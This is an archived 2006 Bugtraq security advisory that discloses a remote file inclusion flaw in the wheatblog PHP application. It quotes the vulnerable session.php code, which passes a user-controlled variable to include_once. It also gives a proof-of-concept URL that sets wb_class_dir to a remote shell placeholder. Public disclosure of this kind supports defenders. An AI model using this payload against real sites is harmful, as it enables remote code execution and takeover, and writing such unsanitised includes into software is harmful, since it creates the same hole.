| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060811084348.6856.qmail@securityfocus.com>
Date: 11 Aug 2006 08:43:48 -0000
From: Outlaw@...a-security.net
To: bugtraq@...urityfocus.com
Subject: wheatblog ُSession.php Remote File Inclusion
###########################################################################################
#Aria-Security.net Advisory #
#Discovered by: O.U.T.L.A.W #
#< www.Aria-security.net > #
#Gr33t to: A.u.r.a & l2odon & DrtRp & Sh3ll#
###########################################################################################
<?php
include_once("$wb_class_dir/classDatabase.php");
function Start_Session()
{
global $session_dir;
if ( $session_dir != '' )
session_save_path($session_dir);
if ( ! isset($_SESSION) )
{
session_start();
// Supposedly a fix for IE6
header('Cache-control: private');
My_Cache();
if ( ! isset($_SESSION['db']) || gettype($_SESSION['db']->db) != 'resource')
touchDatabaseSession();
}
}
---------------------------------------
Proof of Concept:
www.site.com/includes/session.php?wb_class_dir=SHELL
Contact : Outlaw@...a-security.net
Powered by blists - more mailing lists